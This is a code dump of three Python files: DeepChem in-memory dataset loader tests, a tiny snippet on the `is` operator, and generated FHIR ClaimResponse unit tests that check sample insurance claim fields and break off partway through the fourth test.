| repo_path: deepchem/data/tests/test_inmemory.py | repo_name: cjgalvin/deepchem |
| repo_head_hexsha: 64993a129e7f0f78fed9500298b1828ac8a0757a | licenses: ["MIT"] |
| max_stars_count: 3,782 (2016-02-21T03:53:11.000Z to 2022-03-31T16:10:26.000Z) |
| max_issues_count: 2,666 (2016-02-11T01:54:54.000Z to 2022-03-31T11:14:33.000Z) |
| max_forks_count: 1,597 (2016-02-21T03:10:08.000Z to 2022-03-30T13:21:28.000Z) |
import deepchem as dc
import numpy as np
def test_inmemory_features():
smiles = ["C", "CC", "CCC", "CCCC"]
featurizer = dc.feat.CircularFingerprint(size=1024)
loader = dc.data.InMemoryLoader(tasks=["task1"], featurizer=featurizer)
dataset = loader.create_dataset(smiles, shard_size=2)
assert len(dataset) == 4
assert dataset.X.shape == (4, 1024)
assert dataset.get_number_shards() == 2
assert (dataset.ids == np.arange(4)).all()
def test_inmemory_features_and_labels():
smiles = ["C", "CC", "CCC", "CCCC"]
labels = [1, 0, 1, 0]
featurizer = dc.feat.CircularFingerprint(size=1024)
loader = dc.data.InMemoryLoader(tasks=["task1"], featurizer=featurizer)
dataset = loader.create_dataset(zip(smiles, labels), shard_size=2)
assert len(dataset) == 4
assert dataset.X.shape == (4, 1024)
assert (dataset.y == np.array(labels)).all()
assert dataset.get_number_shards() == 2
assert (dataset.ids == np.arange(4)).all()
def test_inmemory_features_and_labels_and_weights():
smiles = ["C", "CC", "CCC", "CCCC"]
labels = [1, 0, 1, 0]
weights = [1.5, 1.5, 1, 1]
featurizer = dc.feat.CircularFingerprint(size=1024)
loader = dc.data.InMemoryLoader(tasks=["task1"], featurizer=featurizer)
dataset = loader.create_dataset(zip(smiles, labels, weights), shard_size=2)
assert len(dataset) == 4
assert dataset.X.shape == (4, 1024)
assert (dataset.y == np.array(labels)).all()
assert (dataset.w == np.array(weights)).all()
assert (dataset.ids == np.arange(4)).all()
assert dataset.get_number_shards() == 2
def test_inmemory_features_and_labels_and_weights_and_ids():
smiles = ["C", "CC", "CCC", "CCCC"]
labels = [1, 0, 1, 0]
weights = [1.5, 1.5, 1, 1]
ids = smiles
featurizer = dc.feat.CircularFingerprint(size=1024)
loader = dc.data.InMemoryLoader(tasks=["task1"], featurizer=featurizer)
dataset = loader.create_dataset(
zip(smiles, labels, weights, ids), shard_size=2)
assert len(dataset) == 4
assert dataset.X.shape == (4, 1024)
assert (dataset.y == np.array(labels)).all()
assert (dataset.w == np.array(weights)).all()
assert (dataset.ids == np.array(ids)).all()
assert dataset.get_number_shards() == 2
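# ---------------------------------------------------------------------------
# Usage sketch (editorial; assumes deepchem is installed): create_dataset with
# shard_size=2 splits the four molecules into two shards, and itershards()
# yields one (X, y, w, ids) tuple per shard.
# ---------------------------------------------------------------------------
def demo_itershards():
  featurizer = dc.feat.CircularFingerprint(size=1024)
  loader = dc.data.InMemoryLoader(tasks=["task1"], featurizer=featurizer)
  dataset = loader.create_dataset(["C", "CC", "CCC", "CCCC"], shard_size=2)
  for X, y, w, ids in dataset.itershards():
    print(X.shape)  # (2, 1024) for each of the two shards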
| avg_line_length: 36.983051 | max_line_length: 77 | alphanum_fraction: 0.68561 |
| num_words: 311 | num_chars: 2,182 | num_lines: 58 |

| hexsha: 87ee25c8134127b48930a2f68c6695139c16ae12 | size: 39 | ext: py | lang: Python |
| repo_path: AUG09/03.py | repo_name: Razdeep/PythonSnippets |
| repo_head_hexsha: 76f9313894f511c487a99bc38bdf0fe5e594caf5 | licenses: ["MIT"] |
| max_stars_count: null | max_issues_count: null | max_forks_count: null |
x = 2
y = 5
print(x is y)
print(x is not y)
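# Note (editorial): `is` tests object identity, not value equality; use == for
# values. This prints False then True because 2 and 5 are distinct objects.
# CPython interns small ints, so `is` can coincide with == for equal values.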
| avg_line_length: 9.75 | max_line_length: 17 | alphanum_fraction: 0.641026 |
| num_words: 13 | num_chars: 39 | num_lines: 4 |

| hexsha: 35501e543bebd7cf73f33f207e1814aa35391528 | size: 34,684 | ext: py | lang: Python |
| repo_path: fhirclient/models/claimresponse_tests.py | repo_name: carolinarsm/client-py |
| repo_head_hexsha: db1b6e3e28036dee11da75412003c7d90e591c6d | licenses: ["Apache-2.0"] |
| max_stars_count: 418 (2015-07-01T08:23:16.000Z to 2022-03-31T14:02:30.000Z) |
| max_issues_count: 312 (2017-09-08T15:42:13.000Z to 2022-03-23T18:21:40.000Z) |
| max_forks_count: 185 (2015-03-30T20:23:16.000Z to 2022-03-30T14:39:26.000Z) |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 4.0.0-a53ec6ee1b on 2019-05-07.
# 2019, SMART Health IT.
import os
import io
import unittest
import json
from . import claimresponse
from .fhirdate import FHIRDate
class ClaimResponseTests(unittest.TestCase):
def instantiate_from(self, filename):
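        # Loads an example resource from the FHIR unittest data directory
        # (FHIR_UNITTEST_DATADIR env var, falling back to the working dir).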
datadir = os.environ.get('FHIR_UNITTEST_DATADIR') or ''
with io.open(os.path.join(datadir, filename), 'r', encoding='utf-8') as handle:
js = json.load(handle)
self.assertEqual("ClaimResponse", js["resourceType"])
return claimresponse.ClaimResponse(js)
def testClaimResponse1(self):
inst = self.instantiate_from("claimresponse-example-unsolicited-preauth.json")
self.assertIsNotNone(inst, "Must have instantiated a ClaimResponse instance")
self.implClaimResponse1(inst)
js = inst.as_json()
self.assertEqual("ClaimResponse", js["resourceType"])
inst2 = claimresponse.ClaimResponse(js)
self.implClaimResponse1(inst2)
def implClaimResponse1(self, inst):
self.assertEqual(inst.addItem[0].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.addItem[0].adjudication[0].amount.value, 250.0)
self.assertEqual(inst.addItem[0].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.addItem[0].adjudication[1].amount.currency, "USD")
self.assertEqual(inst.addItem[0].adjudication[1].amount.value, 10.0)
self.assertEqual(inst.addItem[0].adjudication[1].category.coding[0].code, "copay")
self.assertEqual(inst.addItem[0].adjudication[2].category.coding[0].code, "eligpercent")
self.assertEqual(inst.addItem[0].adjudication[2].value, 100.0)
self.assertEqual(inst.addItem[0].adjudication[3].amount.currency, "USD")
self.assertEqual(inst.addItem[0].adjudication[3].amount.value, 240.0)
self.assertEqual(inst.addItem[0].adjudication[3].category.coding[0].code, "benefit")
self.assertEqual(inst.addItem[0].itemSequence[0], 1)
self.assertEqual(inst.addItem[0].modifier[0].coding[0].code, "x")
self.assertEqual(inst.addItem[0].modifier[0].coding[0].display, "None")
self.assertEqual(inst.addItem[0].modifier[0].coding[0].system, "http://example.org/fhir/modifiers")
self.assertEqual(inst.addItem[0].net.currency, "USD")
self.assertEqual(inst.addItem[0].net.value, 250.0)
self.assertEqual(inst.addItem[0].noteNumber[0], 101)
self.assertEqual(inst.addItem[0].productOrService.coding[0].code, "1101")
self.assertEqual(inst.addItem[0].productOrService.coding[0].system, "http://example.org/fhir/oralservicecodes")
self.assertEqual(inst.addItem[1].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.addItem[1].adjudication[0].amount.value, 800.0)
self.assertEqual(inst.addItem[1].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.addItem[1].adjudication[1].category.coding[0].code, "eligpercent")
self.assertEqual(inst.addItem[1].adjudication[1].value, 100.0)
self.assertEqual(inst.addItem[1].adjudication[2].amount.currency, "USD")
self.assertEqual(inst.addItem[1].adjudication[2].amount.value, 800.0)
self.assertEqual(inst.addItem[1].adjudication[2].category.coding[0].code, "benefit")
self.assertEqual(inst.addItem[1].itemSequence[0], 1)
self.assertEqual(inst.addItem[1].net.currency, "USD")
self.assertEqual(inst.addItem[1].net.value, 800.0)
self.assertEqual(inst.addItem[1].productOrService.coding[0].code, "2101")
self.assertEqual(inst.addItem[1].productOrService.coding[0].display, "Radiograph, series (12)")
self.assertEqual(inst.addItem[1].productOrService.coding[0].system, "http://example.org/fhir/oralservicecodes")
self.assertEqual(inst.created.date, FHIRDate("2014-08-16").date)
self.assertEqual(inst.created.as_json(), "2014-08-16")
self.assertEqual(inst.disposition, "The enclosed services are authorized for your provision within 30 days of this notice.")
self.assertEqual(inst.id, "UR3503")
self.assertEqual(inst.identifier[0].system, "http://www.SocialBenefitsInc.com/fhir/ClaimResponse")
self.assertEqual(inst.identifier[0].value, "UR3503")
self.assertTrue(inst.insurance[0].focal)
self.assertEqual(inst.insurance[0].sequence, 1)
self.assertEqual(inst.meta.tag[0].code, "HTEST")
self.assertEqual(inst.meta.tag[0].display, "test health data")
self.assertEqual(inst.meta.tag[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActReason")
self.assertEqual(inst.outcome, "complete")
self.assertEqual(inst.payeeType.coding[0].code, "provider")
self.assertEqual(inst.payeeType.coding[0].system, "http://terminology.hl7.org/CodeSystem/payeetype")
self.assertEqual(inst.preAuthRef, "18SS12345")
self.assertEqual(inst.processNote[0].language.coding[0].code, "en-CA")
self.assertEqual(inst.processNote[0].language.coding[0].system, "urn:ietf:bcp:47")
self.assertEqual(inst.processNote[0].number, 101)
self.assertEqual(inst.processNote[0].text, "Please submit a Pre-Authorization request if a more extensive examination or urgent services are required.")
self.assertEqual(inst.processNote[0].type, "print")
self.assertEqual(inst.status, "active")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">A sample unsolicited pre-authorization response which authorizes basic dental services to be performed for a patient.</div>")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.total[0].amount.currency, "USD")
self.assertEqual(inst.total[0].amount.value, 1050.0)
self.assertEqual(inst.total[0].category.coding[0].code, "submitted")
self.assertEqual(inst.total[1].amount.currency, "USD")
self.assertEqual(inst.total[1].amount.value, 1040.0)
self.assertEqual(inst.total[1].category.coding[0].code, "benefit")
self.assertEqual(inst.type.coding[0].code, "oral")
self.assertEqual(inst.type.coding[0].system, "http://terminology.hl7.org/CodeSystem/claim-type")
self.assertEqual(inst.use, "preauthorization")
def testClaimResponse2(self):
inst = self.instantiate_from("claimresponse-example-additem.json")
self.assertIsNotNone(inst, "Must have instantiated a ClaimResponse instance")
self.implClaimResponse2(inst)
js = inst.as_json()
self.assertEqual("ClaimResponse", js["resourceType"])
inst2 = claimresponse.ClaimResponse(js)
self.implClaimResponse2(inst2)
def implClaimResponse2(self, inst):
self.assertEqual(inst.addItem[0].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.addItem[0].adjudication[0].amount.value, 100.0)
self.assertEqual(inst.addItem[0].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.addItem[0].adjudication[1].amount.currency, "USD")
self.assertEqual(inst.addItem[0].adjudication[1].amount.value, 10.0)
self.assertEqual(inst.addItem[0].adjudication[1].category.coding[0].code, "copay")
self.assertEqual(inst.addItem[0].adjudication[2].category.coding[0].code, "eligpercent")
self.assertEqual(inst.addItem[0].adjudication[2].value, 80.0)
self.assertEqual(inst.addItem[0].adjudication[3].amount.currency, "USD")
self.assertEqual(inst.addItem[0].adjudication[3].amount.value, 72.0)
self.assertEqual(inst.addItem[0].adjudication[3].category.coding[0].code, "benefit")
self.assertEqual(inst.addItem[0].adjudication[3].reason.coding[0].code, "ar002")
self.assertEqual(inst.addItem[0].adjudication[3].reason.coding[0].display, "Plan Limit Reached")
self.assertEqual(inst.addItem[0].adjudication[3].reason.coding[0].system, "http://terminology.hl7.org/CodeSystem/adjudication-reason")
self.assertEqual(inst.addItem[0].itemSequence[0], 1)
self.assertEqual(inst.addItem[0].modifier[0].coding[0].code, "x")
self.assertEqual(inst.addItem[0].modifier[0].coding[0].display, "None")
self.assertEqual(inst.addItem[0].modifier[0].coding[0].system, "http://example.org/fhir/modifiers")
self.assertEqual(inst.addItem[0].net.currency, "USD")
self.assertEqual(inst.addItem[0].net.value, 135.57)
self.assertEqual(inst.addItem[0].noteNumber[0], 101)
self.assertEqual(inst.addItem[0].productOrService.coding[0].code, "1101")
self.assertEqual(inst.addItem[0].productOrService.coding[0].system, "http://example.org/fhir/oralservicecodes")
self.assertEqual(inst.addItem[1].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.addItem[1].adjudication[0].amount.value, 35.57)
self.assertEqual(inst.addItem[1].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.addItem[1].adjudication[1].category.coding[0].code, "eligpercent")
self.assertEqual(inst.addItem[1].adjudication[1].value, 80.0)
self.assertEqual(inst.addItem[1].adjudication[2].amount.currency, "USD")
self.assertEqual(inst.addItem[1].adjudication[2].amount.value, 28.47)
self.assertEqual(inst.addItem[1].adjudication[2].category.coding[0].code, "benefit")
self.assertEqual(inst.addItem[1].itemSequence[0], 1)
self.assertEqual(inst.addItem[1].net.currency, "USD")
self.assertEqual(inst.addItem[1].net.value, 35.57)
self.assertEqual(inst.addItem[1].productOrService.coding[0].code, "2141")
self.assertEqual(inst.addItem[1].productOrService.coding[0].display, "Radiograph, bytewing")
self.assertEqual(inst.addItem[1].productOrService.coding[0].system, "http://example.org/fhir/oralservicecodes")
self.assertEqual(inst.addItem[2].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.addItem[2].adjudication[0].amount.value, 350.0)
self.assertEqual(inst.addItem[2].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.addItem[2].adjudication[1].category.coding[0].code, "eligpercent")
self.assertEqual(inst.addItem[2].adjudication[1].value, 80.0)
self.assertEqual(inst.addItem[2].adjudication[2].amount.currency, "USD")
self.assertEqual(inst.addItem[2].adjudication[2].amount.value, 270.0)
self.assertEqual(inst.addItem[2].adjudication[2].category.coding[0].code, "benefit")
self.assertEqual(inst.addItem[2].detailSequence[0], 2)
self.assertEqual(inst.addItem[2].itemSequence[0], 3)
self.assertEqual(inst.addItem[2].modifier[0].coding[0].code, "x")
self.assertEqual(inst.addItem[2].modifier[0].coding[0].display, "None")
self.assertEqual(inst.addItem[2].modifier[0].coding[0].system, "http://example.org/fhir/modifiers")
self.assertEqual(inst.addItem[2].net.currency, "USD")
self.assertEqual(inst.addItem[2].net.value, 350.0)
self.assertEqual(inst.addItem[2].noteNumber[0], 101)
self.assertEqual(inst.addItem[2].productOrService.coding[0].code, "expense")
self.assertEqual(inst.addItem[2].productOrService.coding[0].system, "http://example.org/fhir/oralservicecodes")
self.assertEqual(inst.created.date, FHIRDate("2014-08-16").date)
self.assertEqual(inst.created.as_json(), "2014-08-16")
self.assertEqual(inst.disposition, "Claim settled as per contract.")
self.assertEqual(inst.id, "R3503")
self.assertEqual(inst.identifier[0].system, "http://www.BenefitsInc.com/fhir/remittance")
self.assertEqual(inst.identifier[0].value, "R3503")
self.assertEqual(inst.item[0].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.item[0].adjudication[0].amount.value, 0.0)
self.assertEqual(inst.item[0].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.item[0].adjudication[1].amount.currency, "USD")
self.assertEqual(inst.item[0].adjudication[1].amount.value, 0.0)
self.assertEqual(inst.item[0].adjudication[1].category.coding[0].code, "benefit")
self.assertEqual(inst.item[0].itemSequence, 1)
self.assertEqual(inst.item[1].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.item[1].adjudication[0].amount.value, 105.0)
self.assertEqual(inst.item[1].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.item[1].adjudication[1].category.coding[0].code, "eligpercent")
self.assertEqual(inst.item[1].adjudication[1].value, 80.0)
self.assertEqual(inst.item[1].adjudication[2].amount.currency, "USD")
self.assertEqual(inst.item[1].adjudication[2].amount.value, 84.0)
self.assertEqual(inst.item[1].adjudication[2].category.coding[0].code, "benefit")
self.assertEqual(inst.item[1].itemSequence, 2)
self.assertEqual(inst.item[2].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.item[2].adjudication[0].amount.value, 750.0)
self.assertEqual(inst.item[2].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.item[2].adjudication[1].category.coding[0].code, "eligpercent")
self.assertEqual(inst.item[2].adjudication[1].value, 80.0)
self.assertEqual(inst.item[2].adjudication[2].amount.currency, "USD")
self.assertEqual(inst.item[2].adjudication[2].amount.value, 600.0)
self.assertEqual(inst.item[2].adjudication[2].category.coding[0].code, "benefit")
self.assertEqual(inst.item[2].detail[0].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.item[2].detail[0].adjudication[0].amount.value, 750.0)
self.assertEqual(inst.item[2].detail[0].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.item[2].detail[0].adjudication[1].category.coding[0].code, "eligpercent")
self.assertEqual(inst.item[2].detail[0].adjudication[1].value, 80.0)
self.assertEqual(inst.item[2].detail[0].adjudication[2].amount.currency, "USD")
self.assertEqual(inst.item[2].detail[0].adjudication[2].amount.value, 600.0)
self.assertEqual(inst.item[2].detail[0].adjudication[2].category.coding[0].code, "benefit")
self.assertEqual(inst.item[2].detail[0].detailSequence, 1)
self.assertEqual(inst.item[2].detail[1].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.item[2].detail[1].adjudication[0].amount.value, 0.0)
self.assertEqual(inst.item[2].detail[1].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.item[2].detail[1].adjudication[1].amount.currency, "USD")
self.assertEqual(inst.item[2].detail[1].adjudication[1].amount.value, 0.0)
self.assertEqual(inst.item[2].detail[1].adjudication[1].category.coding[0].code, "benefit")
self.assertEqual(inst.item[2].detail[1].detailSequence, 2)
self.assertEqual(inst.item[2].itemSequence, 3)
self.assertEqual(inst.meta.tag[0].code, "HTEST")
self.assertEqual(inst.meta.tag[0].display, "test health data")
self.assertEqual(inst.meta.tag[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActReason")
self.assertEqual(inst.outcome, "complete")
self.assertEqual(inst.payeeType.coding[0].code, "provider")
self.assertEqual(inst.payeeType.coding[0].system, "http://terminology.hl7.org/CodeSystem/payeetype")
self.assertEqual(inst.payment.amount.currency, "USD")
self.assertEqual(inst.payment.amount.value, 100.47)
self.assertEqual(inst.payment.date.date, FHIRDate("2014-08-31").date)
self.assertEqual(inst.payment.date.as_json(), "2014-08-31")
self.assertEqual(inst.payment.identifier.system, "http://www.BenefitsInc.com/fhir/paymentidentifier")
self.assertEqual(inst.payment.identifier.value, "201408-2-15507")
self.assertEqual(inst.payment.type.coding[0].code, "complete")
self.assertEqual(inst.payment.type.coding[0].system, "http://terminology.hl7.org/CodeSystem/ex-paymenttype")
self.assertEqual(inst.processNote[0].language.coding[0].code, "en-CA")
self.assertEqual(inst.processNote[0].language.coding[0].system, "urn:ietf:bcp:47")
self.assertEqual(inst.processNote[0].number, 101)
self.assertEqual(inst.processNote[0].text, "Package codes are not permitted. Codes replaced by Insurer.")
self.assertEqual(inst.processNote[0].type, "print")
self.assertEqual(inst.status, "active")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">A human-readable rendering of the ClaimResponse to Claim Oral Average with additional items</div>")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.total[0].amount.currency, "USD")
self.assertEqual(inst.total[0].amount.value, 1340.57)
self.assertEqual(inst.total[0].category.coding[0].code, "submitted")
self.assertEqual(inst.total[1].amount.currency, "USD")
self.assertEqual(inst.total[1].amount.value, 1054.47)
self.assertEqual(inst.total[1].category.coding[0].code, "benefit")
self.assertEqual(inst.type.coding[0].code, "oral")
self.assertEqual(inst.type.coding[0].system, "http://terminology.hl7.org/CodeSystem/claim-type")
self.assertEqual(inst.use, "claim")
def testClaimResponse3(self):
inst = self.instantiate_from("claimresponse-example.json")
self.assertIsNotNone(inst, "Must have instantiated a ClaimResponse instance")
self.implClaimResponse3(inst)
js = inst.as_json()
self.assertEqual("ClaimResponse", js["resourceType"])
inst2 = claimresponse.ClaimResponse(js)
self.implClaimResponse3(inst2)
def implClaimResponse3(self, inst):
self.assertEqual(inst.created.date, FHIRDate("2014-08-16").date)
self.assertEqual(inst.created.as_json(), "2014-08-16")
self.assertEqual(inst.disposition, "Claim settled as per contract.")
self.assertEqual(inst.id, "R3500")
self.assertEqual(inst.identifier[0].system, "http://www.BenefitsInc.com/fhir/remittance")
self.assertEqual(inst.identifier[0].value, "R3500")
self.assertEqual(inst.item[0].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.item[0].adjudication[0].amount.value, 135.57)
self.assertEqual(inst.item[0].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.item[0].adjudication[1].amount.currency, "USD")
self.assertEqual(inst.item[0].adjudication[1].amount.value, 10.0)
self.assertEqual(inst.item[0].adjudication[1].category.coding[0].code, "copay")
self.assertEqual(inst.item[0].adjudication[2].category.coding[0].code, "eligpercent")
self.assertEqual(inst.item[0].adjudication[2].value, 80.0)
self.assertEqual(inst.item[0].adjudication[3].amount.currency, "USD")
self.assertEqual(inst.item[0].adjudication[3].amount.value, 90.47)
self.assertEqual(inst.item[0].adjudication[3].category.coding[0].code, "benefit")
self.assertEqual(inst.item[0].adjudication[3].reason.coding[0].code, "ar002")
self.assertEqual(inst.item[0].adjudication[3].reason.coding[0].display, "Plan Limit Reached")
self.assertEqual(inst.item[0].adjudication[3].reason.coding[0].system, "http://terminology.hl7.org/CodeSystem/adjudication-reason")
self.assertEqual(inst.item[0].itemSequence, 1)
self.assertEqual(inst.meta.tag[0].code, "HTEST")
self.assertEqual(inst.meta.tag[0].display, "test health data")
self.assertEqual(inst.meta.tag[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActReason")
self.assertEqual(inst.outcome, "complete")
self.assertEqual(inst.payeeType.coding[0].code, "provider")
self.assertEqual(inst.payeeType.coding[0].system, "http://terminology.hl7.org/CodeSystem/payeetype")
self.assertEqual(inst.payment.amount.currency, "USD")
self.assertEqual(inst.payment.amount.value, 100.47)
self.assertEqual(inst.payment.date.date, FHIRDate("2014-08-31").date)
self.assertEqual(inst.payment.date.as_json(), "2014-08-31")
self.assertEqual(inst.payment.identifier.system, "http://www.BenefitsInc.com/fhir/paymentidentifier")
self.assertEqual(inst.payment.identifier.value, "201408-2-1569478")
self.assertEqual(inst.payment.type.coding[0].code, "complete")
self.assertEqual(inst.payment.type.coding[0].system, "http://terminology.hl7.org/CodeSystem/ex-paymenttype")
self.assertEqual(inst.status, "active")
self.assertEqual(inst.subType.coding[0].code, "emergency")
self.assertEqual(inst.subType.coding[0].system, "http://terminology.hl7.org/CodeSystem/ex-claimsubtype")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">A human-readable rendering of the ClaimResponse</div>")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.total[0].amount.currency, "USD")
self.assertEqual(inst.total[0].amount.value, 135.57)
self.assertEqual(inst.total[0].category.coding[0].code, "submitted")
self.assertEqual(inst.total[1].amount.currency, "USD")
self.assertEqual(inst.total[1].amount.value, 90.47)
self.assertEqual(inst.total[1].category.coding[0].code, "benefit")
self.assertEqual(inst.type.coding[0].code, "oral")
self.assertEqual(inst.type.coding[0].system, "http://terminology.hl7.org/CodeSystem/claim-type")
self.assertEqual(inst.use, "claim")
def testClaimResponse4(self):
inst = self.instantiate_from("claimresponse-example-vision-3tier.json")
self.assertIsNotNone(inst, "Must have instantiated a ClaimResponse instance")
self.implClaimResponse4(inst)
js = inst.as_json()
self.assertEqual("ClaimResponse", js["resourceType"])
inst2 = claimresponse.ClaimResponse(js)
self.implClaimResponse4(inst2)
def implClaimResponse4(self, inst):
self.assertEqual(inst.created.date, FHIRDate("2014-08-16").date)
self.assertEqual(inst.created.as_json(), "2014-08-16")
self.assertEqual(inst.disposition, "Claim settled as per contract.")
self.assertEqual(inst.id, "R3502")
self.assertEqual(inst.identifier[0].system, "http://thebenefitcompany.com/claimresponse")
self.assertEqual(inst.identifier[0].value, "CR6532875367")
self.assertEqual(inst.item[0].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.item[0].adjudication[0].amount.value, 235.4)
self.assertEqual(inst.item[0].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.item[0].adjudication[1].amount.currency, "USD")
self.assertEqual(inst.item[0].adjudication[1].amount.value, 20.0)
self.assertEqual(inst.item[0].adjudication[1].category.coding[0].code, "copay")
self.assertEqual(inst.item[0].adjudication[2].category.coding[0].code, "eligpercent")
self.assertEqual(inst.item[0].adjudication[2].value, 80.0)
self.assertEqual(inst.item[0].adjudication[3].amount.currency, "USD")
self.assertEqual(inst.item[0].adjudication[3].amount.value, 172.32)
self.assertEqual(inst.item[0].adjudication[3].category.coding[0].code, "benefit")
self.assertEqual(inst.item[0].detail[0].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.item[0].detail[0].adjudication[0].amount.value, 100.0)
self.assertEqual(inst.item[0].detail[0].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.item[0].detail[0].adjudication[1].amount.currency, "USD")
self.assertEqual(inst.item[0].detail[0].adjudication[1].amount.value, 20.0)
self.assertEqual(inst.item[0].detail[0].adjudication[1].category.coding[0].code, "copay")
self.assertEqual(inst.item[0].detail[0].adjudication[2].category.coding[0].code, "eligpercent")
self.assertEqual(inst.item[0].detail[0].adjudication[2].value, 80.0)
self.assertEqual(inst.item[0].detail[0].adjudication[3].amount.currency, "USD")
self.assertEqual(inst.item[0].detail[0].adjudication[3].amount.value, 80.0)
self.assertEqual(inst.item[0].detail[0].adjudication[3].category.coding[0].code, "benefit")
self.assertEqual(inst.item[0].detail[0].detailSequence, 1)
self.assertEqual(inst.item[0].detail[0].noteNumber[0], 1)
self.assertEqual(inst.item[0].detail[1].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.item[0].detail[1].adjudication[0].amount.value, 110.0)
self.assertEqual(inst.item[0].detail[1].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.item[0].detail[1].adjudication[1].category.coding[0].code, "eligpercent")
self.assertEqual(inst.item[0].detail[1].adjudication[1].value, 80.0)
self.assertEqual(inst.item[0].detail[1].adjudication[2].amount.currency, "USD")
self.assertEqual(inst.item[0].detail[1].adjudication[2].amount.value, 88.0)
self.assertEqual(inst.item[0].detail[1].adjudication[2].category.coding[0].code, "benefit")
self.assertEqual(inst.item[0].detail[1].detailSequence, 2)
self.assertEqual(inst.item[0].detail[1].noteNumber[0], 1)
self.assertEqual(inst.item[0].detail[1].subDetail[0].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.item[0].detail[1].subDetail[0].adjudication[0].amount.value, 60.0)
self.assertEqual(inst.item[0].detail[1].subDetail[0].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.item[0].detail[1].subDetail[0].adjudication[1].category.coding[0].code, "eligpercent")
self.assertEqual(inst.item[0].detail[1].subDetail[0].adjudication[1].value, 80.0)
self.assertEqual(inst.item[0].detail[1].subDetail[0].adjudication[2].amount.currency, "USD")
self.assertEqual(inst.item[0].detail[1].subDetail[0].adjudication[2].amount.value, 48.0)
self.assertEqual(inst.item[0].detail[1].subDetail[0].adjudication[2].category.coding[0].code, "benefit")
self.assertEqual(inst.item[0].detail[1].subDetail[0].noteNumber[0], 1)
self.assertEqual(inst.item[0].detail[1].subDetail[0].subDetailSequence, 1)
self.assertEqual(inst.item[0].detail[1].subDetail[1].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.item[0].detail[1].subDetail[1].adjudication[0].amount.value, 30.0)
self.assertEqual(inst.item[0].detail[1].subDetail[1].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.item[0].detail[1].subDetail[1].adjudication[1].category.coding[0].code, "eligpercent")
self.assertEqual(inst.item[0].detail[1].subDetail[1].adjudication[1].value, 80.0)
self.assertEqual(inst.item[0].detail[1].subDetail[1].adjudication[2].amount.currency, "USD")
self.assertEqual(inst.item[0].detail[1].subDetail[1].adjudication[2].amount.value, 24.0)
self.assertEqual(inst.item[0].detail[1].subDetail[1].adjudication[2].category.coding[0].code, "benefit")
self.assertEqual(inst.item[0].detail[1].subDetail[1].subDetailSequence, 2)
self.assertEqual(inst.item[0].detail[1].subDetail[2].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.item[0].detail[1].subDetail[2].adjudication[0].amount.value, 10.0)
self.assertEqual(inst.item[0].detail[1].subDetail[2].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.item[0].detail[1].subDetail[2].adjudication[1].category.coding[0].code, "eligpercent")
self.assertEqual(inst.item[0].detail[1].subDetail[2].adjudication[1].value, 80.0)
self.assertEqual(inst.item[0].detail[1].subDetail[2].adjudication[2].amount.currency, "USD")
self.assertEqual(inst.item[0].detail[1].subDetail[2].adjudication[2].amount.value, 8.0)
self.assertEqual(inst.item[0].detail[1].subDetail[2].adjudication[2].category.coding[0].code, "benefit")
self.assertEqual(inst.item[0].detail[1].subDetail[2].noteNumber[0], 1)
self.assertEqual(inst.item[0].detail[1].subDetail[2].subDetailSequence, 3)
self.assertEqual(inst.item[0].detail[2].adjudication[0].amount.currency, "USD")
self.assertEqual(inst.item[0].detail[2].adjudication[0].amount.value, 200.0)
self.assertEqual(inst.item[0].detail[2].adjudication[0].category.coding[0].code, "eligible")
self.assertEqual(inst.item[0].detail[2].adjudication[1].category.coding[0].code, "eligpercent")
self.assertEqual(inst.item[0].detail[2].adjudication[1].value, 80.0)
self.assertEqual(inst.item[0].detail[2].adjudication[2].amount.currency, "USD")
self.assertEqual(inst.item[0].detail[2].adjudication[2].amount.value, 14.0)
self.assertEqual(inst.item[0].detail[2].adjudication[2].category.coding[0].code, "benefit")
self.assertEqual(inst.item[0].detail[2].detailSequence, 3)
self.assertEqual(inst.item[0].detail[2].noteNumber[0], 1)
self.assertEqual(inst.item[0].itemSequence, 1)
self.assertEqual(inst.meta.tag[0].code, "HTEST")
self.assertEqual(inst.meta.tag[0].display, "test health data")
